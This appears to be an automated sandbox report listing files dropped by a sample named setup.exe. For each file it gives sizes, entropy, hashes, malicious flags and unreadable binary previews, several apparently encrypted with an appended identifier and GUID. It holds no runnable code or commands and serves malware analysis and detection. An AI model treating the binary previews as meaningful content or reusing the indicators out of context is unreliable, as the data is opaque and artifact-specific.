              Preview:......a_....r<...%.....B...PL....Q.4.E....w<..4......H.@O.j....K.z..S.5X8...].0.5.4.Rn.2.a..R.Vs.%.g#.L.E........E.b..'#q.)W....i..7.v..xS\+...ly....U<...[?.`p.k%..d.|.."....f.`.V.x...HT.i)#..<...G...X...%.zR^..S..f.n.k..Q.&a..N.....:C,.V....Js.A.U.z..*.2I.R,?..zi~&.<..........I.m....iT..........-..Y..>..z../2_...f5..i.D`g.z.+...{W...%.b. }0.n.......,#..Wn|....X%.....Y..4x.G.q..7...^.NV............y}...f...kws.)q..#."nR....B^T..p.5.P.Q...+K..G....g.9.g...).eL;.L....e.T.e..Oy...+......PA.&.Y@?.)...._.b....._..I.#...rI..3eC.F.p[H...^,.ayv...9.P.g'.6B..Zt.......d..W...w..`.H7vJ..N<...m.6o.KW.F..v..!..8nV.&..k...>T'.>.D.*.}.......$..O.F).\MA....dVA.`.1..l.N.N......vQ..f......z...8.&n.[...+.A..:...h....no..y.5gD.@.1:...'v.L.;.]U7....0..s.~........t..b..x....K...E.....J5"=...vD..HU.o..(G7.H...,<<gE._...z].!..n.......{.....(......n.........4.....=.9.R.Q."...B*l.....S.=...%8V|k....-.=...W^0?.Ur.@?..&^-.d......b...ky|6..v.vFn..8.E..B6x.~Y.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):350
              Entropy (8bit):7.2647747462274985
              Encrypted:false
              SSDEEP:6:aYmoRQgXGDki4iZYfU2FNuKZbxFlpXF/Mc9HW6ENLscJ1CTQTSUnY0WsXkNR2ciD:N8gWAiZYpMUFhMW2pNLscJUNUUsMR2cq
              MD5:0743D7DAA81B4A2689C89D8B96794ABB
              SHA1:E1FF291DBEE7395334FBAE9DD4C10EF5623F1B84
              SHA-256:4968420C581289CFAC1EA30D9961BB0B5BFD9F17DA38CDA7598CCC96945020A2
              SHA-512:30AE55CDB69B5171B8E3AFBF9C0EFBCB810F96FA0EAA777570A1BBF25FC69FDDB33E57F5BFBBB55EC395879CFEE74E13B3461FE5EDA0C84B945714C72F04E8D0
              Malicious:false
              Preview:..J.G..*.,.^eC.R.c..yo...._%..RH.Qz....{.....?1.c-...YG..(....._v....{0."A..:..%}...`q..._..B........z.F....... a.B..-..1.<,|~g..X|/atp\W.T.p{9..B...7.2.`N...?.%.Ib.DX....:.r..u4....)-u.E...f7A.i.....U..j..."E...%1......-.&.....x.C.a,...ug..Yf.\].X2.<.^>......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):155189
              Entropy (8bit):7.999004335811594
              Encrypted:true
              SSDEEP:3072:/ZzjmS6EogNr2EtE2s0Cn9+iidnIY0GrgWDe5Zq:BzhogNCEA0I9UpXe5Zq
              MD5:5068B687A234C4697E858EEC4F1F6D39
              SHA1:719511A8532AD3B20D5B9F893339BC33761B9CEE
              SHA-256:8B5C3693BBD35FD7BBBB3E895B0A1830FD9F37CABE7C3ACF20349F9857D0DDA3
              SHA-512:7ECF4470C082496E98729AC7C76122D30550D1A2BCC3F8847738189B0B4BD766C35A378CAF140F246CB0E47A65ED9B86131D45B13DCA7E530C1023388A264C72
              Malicious:true
              Preview:......E...,....&..[.......7pb....#.A. ..u.....O../mE.......H.]_ .....v.gx..Vz6.+ .e"u......7.8..`N..G.G..6[6..s.v...Q%.....-...C.z..!.D3.......x.)........u.u.^.t..E7.0l.L..h.\.|G.C.n!<u..b....T.C#).}.....`.~...<.8~.G...r.....8V.%.m..R......f.&}....uG'@X.k.|a?J...........+.......d+.(.$.J.E......I...@rj.+I.4#.7.;!...._.j...[2.i.....:......fl.yDp.^...H...l..0..n..".DRkY....m..k....Y.a.Z.QO.53.a.M..@..U.A..O...j.Y..ipo..7.ssw.x.1...=...K.7[.%RW@l............E..a..U..y.c..:;............\..wR .Zs...lqZ...q.N....E.!.....O..... k...7.!8n...D.F,.*I...J.&#...(.....u....*..XV...b.}@LD.O.....*.b..:z.M..#.u.N.8$.Q.....2hQ..@.)l..H6.XA.{{.+.2..$.z.%.~p....:..B...z.......)....m.._|.0E.r...vfQx...7%.P]yn.G....Xg...o.U.......B.Nt.b4.>?..(...DW.Uzw.....*...T.....'..@..e?..NN.M+.C...b%.T|D*....h...9.L...a...t...hZ .......2..54.x.t..ZyX.?X.I.Xr9.4/!B|...d...dT.F.0....:......L.r..=L9O....w..;!.)..y....%ak{....IX.a{..m.D.\.{s..`...H[..Ql.kxK..hC...\.:O.O.l....$.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):350
              Entropy (8bit):7.216758078121766
              Encrypted:false
              SSDEEP:6:Jw+otZBjQ4qyKWORi0dbG2gso+4RMkBt5rdD4LyaWsXkNR2cii96Z:Jw3Q0KWORlgsmbBtRmLy5sMR2cii9a
              MD5:AC098BC0FE6CC61B31FE85365FDAA5A8
              SHA1:3D2C567E138708B915515D762748FCC778A4FCE1
              SHA-256:AE9784DBE376E7273ADF2F4250ABB4F41900DE8BB70062499246DB6A336496BD
              SHA-512:00911C88172668C046606167CA93C6E2876F10B18256645868E730D6B77738F917430A177BAEE115F861E2B4B31231E2D952912AFFDBA3F62AB5E0A4138498A3
              Malicious:false
              Preview:e._.-.#w.j...7....W.e...3U,..y.o.0......GG'/.......f.1.h.(../..?`....8BB....p..-.....b.....D..l=.@[...t.wo.I.(..R....b-.LIv.!WY...'i._.*..U}...W.bX..Ay.........V.m.y.......t..&b..d._Fm.....L...z..0Yz.b.|........El...C.Zr............$....9.......P(.n..w!..+.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):155717
              Entropy (8bit):7.998770201757514
              Encrypted:true
              SSDEEP:3072:ILDJGgGQtwXIweaQAJvck5O8AyXXZK1l83y25NDuac57xmekWoVoNnha6Bd:IhGgRRpxAJvck5O8DJElKy25gaK7gpf2
              MD5:328D12B6E707194B7895C729EBD72239
              SHA1:2D16E57927BD80E39B69C0DCFC51E0279FFCE0A4
              SHA-256:E5A4EA208B45EAB4D6DFFD91C52A1B3A02352E741CAA629D526816DC319AF4BA
              SHA-512:E6461BE75EFA08B45F1C6B353857A709A64D3843AC752C90EB38109AF911AF7E002CF8F9E746AF98C1B4326DA252940B23BDDD3258578AB6B978A25460BFAA3B
              Malicious:true
              Preview:..... ...q...l.4......q=.........vEi...%..^...).)s._..0B!...T?..VJ..4.K.k..o.j...j......YM.E......R.65~..~y.......;.d.....=h.GX..a...x.4.Y(.TK...>.......["...x....y.Wepv.P~......A.WKB... '..U....G:,..?.gM....m.......4...gxB6..X.;.J....:.g..4.".....rY..n.....B1.......H.i,....Y.H7.9./._.l6Z~k...`..D.9.z.{..4QA.0.......z.B......Hu<...._xa &.........!..b.T......y..jNO...<....B....D....s.W.....1...0H...t.t.6z.B...B....L.."~9..f.>...%.N.-.t.<:.....b...F..n.=...z.t.....k..-wh.4..+........0{0..k.V.qe`..t.i...b9....qk.. .w.Xw.. .'....I.P.....'NL..M...I...u.=.O...b....>..yZ.;.......$...A.[mf&......i..r.l..:........io..........K5:....5.F.X..$.,...'....<(8.j ovxv.}.s.M.,..y.aU.....<.....W..%.. of...=.v....;.....V..t!.)R..+.X..'..H}x[.c=.'..T.UuJ.^Z.AQ.-yj...$......H.3...wv.R.QLs..|.I...D....9.T.A.../..x.R.cd.hr.......UL.v..y.9.vW-.......KA.R.jxHSW.o.......8..=TLD.e#.EM_.L..+-..GH.S!=.....`....\...[P.SF..7.4..0.Jz.b.......>k.5/.<~.lr..S..kDK.kY.V.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):350
              Entropy (8bit):7.260203828066137
              Encrypted:false
              SSDEEP:6:btJHyHNPQsXPt52lNl9bv1IqaXLWwb4M5yAkJMmQXPtAGJu4SuHgpWsXkNR2ciik:btJStIStw3LcRN5bMA/OQu4psMR2ciik
              MD5:9677E98E687196923A92E34717BB0C7F
              SHA1:9A3930800B48CDC61AA32AE837BAAB6C6555FC2E
              SHA-256:2A8E5A5C8C2F4C35BD85C4EAE523EDA0A23235CC5A35EBDF8B629908315C19FB
              SHA-512:A143837C4DD2E35C02DF4AC39A09A7DE7E493C5F921283CD6A9290C8A3ABF3153EED875A40F857DDA6ADD65492EC4D7E8F54AB5D93D58D531333F5E1A8686ED2
              Malicious:false
              Preview:.U6.,.oC.$lb.9...j:.4.([.Ud,.K)..LZ...E.C.~?6.&.4<.e`.%..4...../..(@.v.x.d....(.lE..7.\d@..4=........qA......."O........".N..<....[.......x.-.^.;8|..o.&...Mx.R.(AXd..6..r.f.n.t].....F..]q9g....58].XK..9yA,....-...l.......Q.j.z2...N._. .&R......a....`...j.TG.X.boVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):29006
              Entropy (8bit):7.993697989869788
              Encrypted:true
              SSDEEP:768:tuZRlUTBklpLgrsvh/oua9QcKoLhsHV+z:t6lC6ltgIvZob9Dl4V+z
              MD5:CAB28B3DB73A789DEAC30C98024D95CE
              SHA1:3C684B57B1801410B34DCC0511A33F702D53D53E
              SHA-256:3762B0A542EEAF7723315F96FD00BD23729C5CDA61071A4CA1EA4D5886E5D1DB
              SHA-512:357DEB24F2AD027EA219E8BDED2384324A78EB87CF492B05CAB9126CB1EA10EAA1D2FACA4CCF38D31FFEE78FCE2F2A425DF6B2903783F49AE27CB4766A96C044
              Malicious:true
              Preview:SQLit.&...X..1..]G.m..J#$.Thv....L......vV7W..aI.~..>iV..o....;..a.o..u..xTiaB...p.~.Pm..]...kpb.)0............?.4q.P..fiI~.Y..x"G.@F.Q+>YY.gO..........\."%.....}*Z5{h......E.t.X...4 .w....8..7D.K.~...{.xo.......\.D.f.y...8..*..1.N...0SA.R.7..>>..s\N(!I8..f..4(....K.....aw.WE.#.A"...v...s.1.{..RIP.J.;....4;..B!n..."..T._....vS.....W.[......rV..u....qs.C.... ...._..<.n.s@..=~2kq.......|.d..,!..e..! ..#q...U.Yf..N.Ui..S..c~...wq.G.Q..$...,..P".x.).._.[..*.<f+....*ey.^...v..*..E./.........R..W.......\..v=ZS.M....\UWN/{..`.)..&h...Qmx{y.}..;....>E...c.+?.(/.wq.U....P... l..OZ.....@.f.v...i..SW......1.0<zW..X..>.......Z~.h4Y.G..G....x..88_.C*...nj..Q|id..v.a........)w..\...aak.. HO$....I....b.T..\....\.Y.H.s..> K....?.pg.}.I.$rq....3..7.V....,.C,..H..2!. ._~U..... 6.4.7..e!..........x......C.~....lb..[o,....D...e...m ......YU.'.7.L-..V?...D....z.}5..V%0=}R:..[....+.=...Q....h..'P.......,..P.hW..\%.[f..b.*q3GcX?..uj|%-........;:..p..p..^....8s=
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):499
              Entropy (8bit):7.541165854692587
              Encrypted:false
              SSDEEP:12:qsDeq1VJMcAooROFqPIcOrwfMWMu1n0G5Nx3EMUixuzsMR2cii9a:qJq1VsRYwvOrqMm0GH9uYbD
              MD5:77B1473494E2731853E389F69652504A
              SHA1:457D50E137F269D2B4AC608B31539047B176CC97
              SHA-256:A512355F8CAEE69722BF1560CA66B5BED996F9D7694B52CC7B5D391C68436A11
              SHA-512:E7B52AEC4969A56020A32BCA780E84F1E6572B2052F6CF31388EBFEB0E044C64A4C9D4F54162D50C697542AFBAC85BB9ED6213A1CE43AEAC78A713AD55CECF26
              Malicious:false
              Preview:.....P.Ux".....V.7..=......n.1....I.p.l.ZH`....wF......Ud.UxU.../a\.|0.=.A.B.....)..z.-.7.hx.........m..^.&.........A..!;E...L......`t....`.z)&R...C1.Ecd7.)...^...vA.~.,...3{..9...kO..O..o..D\..g.... L.A.&D&j1.....%..i*...Q....$_...E2,.%4..4..:Sw.e.n.eD.{0...P..$....&......d...va[....uP@^r....)V(Vc....../.......,..B..S.,J......j.c...I....m..k..`."....+...b.q}Y.U&.. ..]..]F.Ru.X".Jv=.yy!E.<l.s...W..^w.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):14258
              Entropy (8bit):7.9882022684577905
              Encrypted:false
              SSDEEP:384:zs3urfkVR/xAQRCu4X9mcy1MozBp/ZnKja0Mulcgs:zg+QRCu4NmccM6ZKjFMulcgs
              MD5:22C2FEE50ABA5E06B3C8A028D9671B69
              SHA1:35277439883781A38F2A7DB6C706CBCFAAB0E0D3
              SHA-256:FD31A816DEAA464B74C613FC77145E1342A2646DEC23ABD6238E3A2533A26E61
              SHA-512:F53C55972EF6DCF48C54971C8323B680DEFE83CC562FD44BB77888096B42CFE5C92CD64DF02E315646AD1E84325678A5DF923E44EB71F973967EDF7780524A8C
              Malicious:false
              Preview:....T.b....._..rWxmS.#...w"K*.Wj..@F.Yk...G....)....?}B.P....-..S.>'...4Bo.r.w..1|...._.x6b<D}b....<........?...UV...X.....5.>..... .O@..t.E.qs~....!...\...S,./.;..T.F...'...!...O...k..+....f....-...0j.L"},.**ZF.qOx..9..2c.hX.4.p.. \o9w.Y.y..X%.D7M>..I...HT..oD...*.x.K.<..#...>-.C5'g!`.3p..0.>*...(.^..R.krN..&..P.......Z..H~....(..h@.E.]..r=m.m.....E+.4./......W..r...&...52...f.'....hV....."..N.1.[.gs..o{\..].t..=...%.(..)S.Pv....Eo7n..Z....g~.-...0g.S..@...n"..K(.v....+o-.2..m)}....h..F......,....C...f`......"%...@.iPS.=...-).\D....?.t...*\..4....5...Ov....8+3.$>"..;..E...8...xN.#D.._a@s..b'..F....s I'..,...T..!....,..%.o.m.*.+.x...j].m1.....X-mSb.8;O1..f;;.n.\u+.Z./..E..a..Y./Q.......Eh)...Z.bS9..}0.Q%Y9......VyJE.>..<....N..+ma.f.i....B..%y...?#.....v...b.^.`/...t".C...u..5..30k.D....!...@..e.....:.G.._...N..t"...~,.A-~h..,..H..YUf;...c7.;o.O.FMJ......8A.In....7.h(.%.../....8...H.C.G&QE.D....&..;.;q.-rV..by..y`..D..#).Vk.w*
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):347
              Entropy (8bit):7.268889972561175
              Encrypted:false
              SSDEEP:6:BMQdoY7XzAYekqWsvhuUSKFejnJ1VTlxSe7GNYAC3EKbedF3BTqWsXkNR2cii96Z:BJ7XEYmWsvRYhTlsW3xbedF3BJsMR2cq
              MD5:3F562700B8458F7D55D93D2FC5C06044
              SHA1:ABC642832B52D745C48A28E06FB9F2702AD17BC3
              SHA-256:2337E49299A4E178140732ECA8B2AA12573DF55A948ACE82052F75E6E768B059
              SHA-512:363239D0D56980E128A75130956122BB971336EFADAC04BAB22F4906F9A9D98BA5D91CA63175FDE1D99DC90EC07DDBD71AFAB7AF8498E5F66513FB492454C42E
              Malicious:false
              Preview:......\EXw....;g..r...T..V.v.....>4.#;A.xo.....~.*%......P.M..0e4.;..../WVO-.y.SD....d.aE.%...}..$..=...z...gc.8pe.b......g....I1p..rd.73*..f/~.<...0..`.8[..$..E..k....gn....]...[......{.....|}-`.>.. .{I.t..].....>.^.... ...$.;.-.......t....Z...=.vG.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):392382
              Entropy (8bit):7.296486647170928
              Encrypted:false
              SSDEEP:6144:/0tES2qihd7AUCTg5gXpqQC7SaPGNFzq/RnfAmn+qGk07U0z9zMfp1BLcpxd/8qg:/P5qw7rF5gXpqQMLuNy5Ymn+tnOp1BL3
              MD5:5455C4D426590B962466E2EC8DED5ED5
              SHA1:50B02D95EF6C1506ED435A5FC9F70ECB22383CCF
              SHA-256:3EE557159B41918E18884D7E5DBF49B821DBF54C45BB4B8FB9560B1A8174B7CA
              SHA-512:A796CC06C3F079F941EAFDC76732BF80EBF571C559A072E257619AE5C725A82ACC7A9DF67A6A71A3D55EC6675D8F3B41B672A49E22613DE78BF89B761CF2E91A
              Malicious:false
              Preview:....T...A.@.?..<...D.e....c.Ym4...%Z....(b..Kq......R..y.q....E`d...a...GTR..y:MZ....i..=..w.....H.ioT./....D.Wc...j.d..JU8...K....4..P.B...O../.......I.....bD...E..M.E..aCT0....w...U..*..<e...X.M..Bk.../o.e,....*.gf...=1......W.A..Q..|...dp...`..AK.....&b8...z.S..36f:.Od..M...|4&...V.FRr.t.u.k...x.^)l...MH.8.Uh....6]S..T..)...c.l.6.W.$.o......Slh3....7.."S..'4aW.&.......K.4]T.5ZC..,U..?..*.5Iu...q....%....4.phy...}Z.....>i_....H...._...)....Sc.Yw;..#.=.....Q{..K;R./OPk...R>....Z.....'T..^.v..X.".yb~...d.'/...S..N......qA.m."N...}.&|.(....BC.[`..0s.|..C..8!..e ~.(Rh.n.c.yw.R.q/..........o.....}..E...%.+....m..3...7.M..`..E72A....|.e.e..p^{..o..._.4Q!.....vg~.:...p...:..}....,...ig.b..Qy5...I(...*.WHyj..yg..6.%..o5...i..0,.."^vIr..z......G...2.....?.#.8{.N...Y.Y..CE B....7f.rFl.d:a......kE.]....gk.Bp....p..6.u..U1Cf.[e....3.....Q.2l..T.k.t....q..]....|)5.]1.-CU8'....6.qrT..s_f........h..8.*...A..1.........$.2..lc.......).*....a.....>N^w.}..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):36745
              Entropy (8bit):7.995144866940136
              Encrypted:true
              SSDEEP:768:7AqrjTSxolrHfQxjkIWpS23TiKSJ9qiBuaW8MhYuaxLZ:7AqneifQHWpHuKSJ9qSXMWxLZ
              MD5:FE1FAFC01D5ECCC5965C58B438AF667E
              SHA1:C1DEBD5214E4E6FF5495D736D948CBE208C06F56
              SHA-256:D8B8D66BB653103F287E3E46A6372F6F5C2B0BBC76A4B9E0F4A8B128D8E05D45
              SHA-512:C0FC8365A6D82259A0956CC4075F2B5B98704F4FC530BFE0BF75350337F798715FB97965F97F4CBB9BF8BF31E6DCCC14976EB2866FD0A1A73DEAE8C7C7673614
              Malicious:true
              Preview:A..r....Qe1....>;[z(k..i.....g+f._]..d<z!.B..#..@."...q.e...(C"oI.x*Yh9..[=r.. O..e..%.`.....Q......@...x.^..g.5..'.QCDv.M...:u..P.Y$99I.w^5.....{.9.h...UK<:.gk...q....s{-<...2...B.G..N.P........8.f9$5.Lw&..FC.".T.'......W......_@.)C,Hp}....1e..h.$!n...cp.q...>&,M.w|N34Z..f..F.... r.AmD.32.BM........3.W....8q.p.vT.t....F....o{.`H...._...^........A.W....0.....[. t...5..d.3..C.n..>t..p.7F......O.@.sm1....s[.4...*..'z.C75..'|.D(C...q5Q........*O...c......?v.ny..rW_.A..&........^....e.b)....m...h...<.k&zz..&).d.............O..7.........c..Ld..O..I{.D.!.*D.g....z1RKYn. p).M....v.{dj4.....76....!T.!W..}.1...(.z.....jA.@...tf....;.GF.....;..%.....Yw.S6...z..~E...jb.U.Nq......f....z..rQ...' o1...4&....7..7...r..{..7k..Z.(..2&...k...c..?.T.g._.mAJ.F.)f.i{X...q..>[.L...T.....E.C.e..hfQ....N.L.)g.h..}.....izy...vg..n2.l......].<K...r.jv.#p.....7../.....t.........v..+..X......v>......^....k...wT?.|.)MP.G.K....N...nidw.``z.{..!..+....r...z..R->...9...)..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):660
              Entropy (8bit):7.687300721761306
              Encrypted:false
              SSDEEP:12:kVAPvNCMobOA8C3jvdVVBFNKXcDtt8I548Zw9yvvi4gzQL1+gNS7a/8hNsVMzsMS:YMz8TvTVPNKXcDtTA914gzNgE+8SmYbD
              MD5:A08DC128F0AA7799FEA747000B3F59D7
              SHA1:65EA2EDF8CD9A1F48B698726EDCDF7AE4AF6174C
              SHA-256:CA9169DBAA7B9D40A58B4595BBE91017E1A5966EEDE5989A65998A1D36429173
              SHA-512:060114A04FD0C99AE532A66204D6B66C1ED0E51929609436591795984107FD1916926CB7B2D00B86B6CDA1C9BC556E8FDD448F9AF2B79E02445DB25457D9924E
              Malicious:false
              Preview:2023/..G.n...f..v....:GN..Q.A%2j ..d..=A..$..4.....=l.m`s.wD.2..:/.....'...g._.#}.....>..>cY............G........].g...h.7.S...#.-.)...S....{.T..."zK..j..)..J...6>..@Z..N.%..+..nW...sd!......T,..8@..}l.>..Af ..|...y......gj.<..u....gor...E~;..b........J.i..."..o..M..f.#..;.As.........w.}.t].....Hxyg..FY...d....jd9Q(........)l._...w...m.C..U..*.....~_...[j.[.0-.~..&H..{..3.......u..V....U.jmg.~.....>/.~..M..AT.C............o..C......ZAy).EeU..:=..j).u.Z.:>....I.....1cP.4.../....@.S.8.........:..m.P].l.......b..ET7.CG.S5.....m..@.~..i\..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1446
              Entropy (8bit):7.872670012899183
              Encrypted:false
              SSDEEP:24:G6lvPY+fmDuBHjguC783GnjcChccQVR8SiP/jmHOA4UYqXuUP5myrGnm4DpbD:ntPYdDuZEwCcChcJ561A5+U5prGlD
              MD5:3A7237E681D3DABC125C85A38657F96A
              SHA1:E7884E09ABBBB887F46A969545B754B0B13DC5B8
              SHA-256:09BFD6C35FFB701390585BE0310349F0B153AD43920F961E30075434626D94A1
              SHA-512:DBE55F43C324DD6CFD019B04BFEC318B4BC1230A221F26E3C7CF693AAC30ED635604ACD928ECD7E2AE68EFA93EDB4055BF2CDE1A8BAD681503D63337621A7C01
              Malicious:false
              Preview:.h.6..m..a;.?q.r.j.k..`.7..d`4.........r.N9=............o=...#J.....w):pBb.8..1.K.Xcy....."...X...C5u...7..M<..$/S.>E[ N.....i..8...zE..Ii...r.Z..{...<.......d...\^z......3..'].@,.*.z.mK....#...zB......I..6>.z..&...Kb.-=..*J.....sUV.....*..k.*.VCk.\.......m.....H.4j&)..dXp)..m[.8U.....w.-....<..h........kW..j9..L..'~d(....T..Z.I...2k...J.p...0B......0.X..$.g.x.U.q....$...o.%..s.@&.F.X.hi....I..UW......d..)2Q........sO....,]8...R.d......X?....f...........ed.O.!>.D...5.#.."...[...3.Wo....>.....d8....].....-...V..u5R.h.tY'gk..&..Z:...+.1$^..;...R:...cjcMN$..A.]..L...=z.......VA.y.r.'.r..\.E....(e..'....N.....e....\...........;.....`..O....6.i:B..HXq.....*Fc'.....()^-h.t..M"I...7k....n.....+..L....'.$W.......+sO.....B!...'..hc.(....3.%.i\....Q<.....z23.<..Y.g4=R..4`.........0.....@P.+:c..0HF.M..a.g.9.K....:.......(,.;...6H?..*;H3.}.RN..$.........s.;.P)s.A.&[N..,#..w^.q...g....e..=..X.`.Y../?<\z..&{..5...B.6.R2..A....5T.5.\.t.....9.r.{A.D
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):678
              Entropy (8bit):7.648367678516919
              Encrypted:false
              SSDEEP:12:kXygyANdNpJDhdiayFQqKCFJl37JgkEZ988G6a0LaZ0O7vKYy2Mp0MB5y4QArsMS:uNjpJDh/y2qKCp37Jg398pB0U06Dy2MM
              MD5:49A7175EAC2C906EC4632D46470CACE0
              SHA1:6B6144888B8A1A80330E58B4BD6E46C6D12B9A6D
              SHA-256:5863E38EBA51A9B6291367A61CB1BE2A20522CBD92193695A331EB44447AA226
              SHA-512:4B1049F209CD7B74BFD65279220859435B07F7C69024C532E3715857C142FE6FA5B9432FBEFC7572285565FBBF907DCA664B8B6376982BCD28E928BF5CE0F21C
              Malicious:false
              Preview:2023/....T.6.JN..s-..4...0....>..t..+..yr;..+../...H..>.9..P9.H..]...]5.....z....b...H#.x.h..b..X&...1.1....k.J?..)..9.Q..c.P.....>.."....<%..8...3...61....-y..S2Yc;.Ef..X..........P.......x..g..u/2....z...?.......#%......6.I...$..h"R~.....a@_..R......Q...j!w..;..g.s...x..........K......l..1...rSQ.0.....w..].F...r.r..J.g.YR.9.)i..008.j.#......y}..y..n...i.....z.[!..Y^A.V....>_-.}K................b o.?}.Q.V.- ....uT..B.....M.....,..$q.&...N......6...%...m..z.J.).............v....2...r.M~.g3].... z..Y...`=..$.s..jA...].8.............P?..[.|../&..X.;w..d..*tK..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.996916361028879
              Encrypted:true
              SSDEEP:768:cWnJw9IpTbE+Yx3qkxbwqecQPSHgmq9Ttg1trnk9tdg6uvcGrCi52tZrVP/4nBld:cWdJorDxUq6PSnqc1mNfo52LalPeY
              MD5:415E33830AF3C18691C07DC62A4A3FDE
              SHA1:6808294BE4BA1B2BA347E067EBEF0F97A85C81A4
              SHA-256:7B385FA463BA3D9AAF3D732325D579FF7F56E3DE959D44DAB452DD8F7D2B0795
              SHA-512:7DDE18D286512409467A4D8A865BAD24FD73AE7676E98DBA7CA6102D4985FFB4C893C88BFFF9E3BCC6A3C45BEB207A2EE493FDD9DCACA2CF8299D24FB402CF39
              Malicious:true
              Preview:SQLit..0....o}..\...<.m..2...e.....9E....[.xbA..(.@.....n.`....?d...@C0Nj..)$Q%....t"/Hak..u..H..K.6...K..O... .....w:.!.....6...7...B.v.h2..u...TI.}...[pH*.K*..x.)Z..}+..-..3........A...t$..>qK...0o....!=]..-X{.P;.k.O......Lp....=..\T.$Q.J.^..M.}..K>..>140...3(....1.]9.qv3g....Vm... .7.V].p...,.!b....2U..\..G....ax.J.........)'0.D....um.4.e...9..........f.Jl@8....&|.@j:bS.5b~.u!.f1..F5..S.u!.4..u.?.4...9!.M.a,./6........n-G.mB...RV.KL. .......[F.|Z...|1.pb.X`'.l.(.o..v.r..=..%dI..../.a......*|`Sq...*......6.....c.....%..Z.....M.[....{...*...^.h...?.iH..C.Ye/.K|..^\..v..b..../.o..e8..0.....F.o."W3\...A.\.9.U.]=..4a-.D.^d...7S.vx..G....ED...>rf.d.nF......r:m.h....Aa.i4...A..;...I..Z.7...w.LU...+.........=.Q..&.aF.H........3.Y.P..]..u(.S..4._N.Z...z.9...RX......;o.K..B.....I^.^....a.2f1...O.Q...e.Y/#v,.).....W.`~O.M......OE...>...D.....L._..{.... .l1.SWU..V....9st.Z..k?...]W.1]..(.e:.Oe<;..#o...\E....h-..PJE.....^.i.....G-4...`.S..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):354
              Entropy (8bit):7.294373861042936
              Encrypted:false
              SSDEEP:6:QGm7eQBCws7Cb54gomjPUqI8wU/dI67Z8eYVio9jtI70ZzQKmWsXkNR2cii96Z:QGm7eUAumg1jSUys8eoj9VQKdsMR2ciD
              MD5:F6182CEEF6FCDFA5E45286F1E133FAA7
              SHA1:CCC6EA78345822F4F02264F5953EEFC8413F09D3
              SHA-256:19A1AF9DA8ABD44C0151EA65456363EF2E8FD132E07161BA1F854DB29D2935F9
              SHA-512:BBEDF9CFDC74DD957009D9DDF067663C3EAEE4111258EDED5E300F3515EDC6218DDD104461BE5BCE280F8E666D82B752E095BF9BB69002A6ACE627AD4F50683D
              Malicious:false
              Preview:1,"fu......+..\.U5..k....4..YUv..O.H.. ..-.<. ..)\..{.@.kB.M..[..`<#]jF.r*.id[....#4}.*...Z.aR..<.3Y.2.......S.S..rJ.3.........{.Yd..w...#q.|.CH8v..9.?T..1V..{W}.Af..l;.1..d^.......>t8..l._`.0p.....l.6...".[..:P.am.0..H....-...v.9.!.....&Z/k..`...s..v.........t.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1554
              Entropy (8bit):7.870711234909136
              Encrypted:false
              SSDEEP:24:0119Vi6Gt2TM5rCA7RGg8n3d/OMK2ve4NE0hg53jfXbD:K19IbxJCz3dvtvBN/W3jrD
              MD5:E09D347C6486396C17EADCA89AA4DF00
              SHA1:70237F18F224C83504B8AEF15D442A793B938EA4
              SHA-256:A4B2F81AEBC093F8EE2CE773F50165AFBC4FFDB586B06D167927A49230A84258
              SHA-512:1622E5730F81E992B591AA354C5CD26B56FDF7F5C0F977D1CF413562BA244B2E2EA2BD3546FE2FC5AFFD4DE9612239CB8225559246224B273DE52C4542343519
              Malicious:false
